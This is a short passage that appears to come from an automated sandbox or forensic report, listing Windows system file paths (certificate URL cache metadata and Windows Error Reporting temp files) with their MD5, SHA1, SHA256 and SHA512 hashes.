SHA512 5fb227f526c6d93e55e0e7e504d1336d6ed5ec60f62d18771c2d3970bd25f3a0c4f5619162d33a66f1495850a6f16bff0deabf9f2752053fc84cca16312349d6

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

MD5 713235d54dfa7cc46c168aff278a35e5
SHA1 8a2420651da8dfb4f3a2fc2d74a0174813709ecd
SHA256 af8df51b7bb0977ed751957cdbc25e4bd55ebe37f3382cd94246dff58a0ce0e1
SHA512 359d3ed14ad983dca7c1645540f62ef809620d7518e27bca731fb2946c3658601b8ed7c73952c985cda6a8516434cb920094ba27120731c759b7c8d15b6b5154

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.73d7450b-e12d-4fe1-b79d-4b898a10ab60.tmp.csv

MD5 3a3667a8167841dd05fd5659a3f792fc
SHA1 2f10890642fd8967216030118f71878ba354a85b
SHA256 f6aeedfacb6337bc5385697d671879fcb041743cec6d334c254f38c3957688c0
SHA512 08ae11df864fc5dcf531483ba622f6b67f88ac90b3bdc58d5dfadbbe681f14edd745c1b09c5a42780763c16ddb41c45379512c23a50d504e2a38f31201fd098c

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.2b635f1f-dbf4-4168-933a-a601aed43ea3.tmp.txt

MD5 b9bc230d8f68396be986edde3b3c121a
SHA1 3ca9e4ce80a10d44561ca568c2ab00125258e68d
SHA256 16f93c086e7e5801ec888eb096660d80199c143869548ac5d73af5121836a92d
SHA512 191811eb896cc8a8a926935616040a8a35aabb7c269ee4625a00a81193f66e92e9439e05032cedb2be76eef773a3e11fb3e894870899bb05f432c5d30b5693f3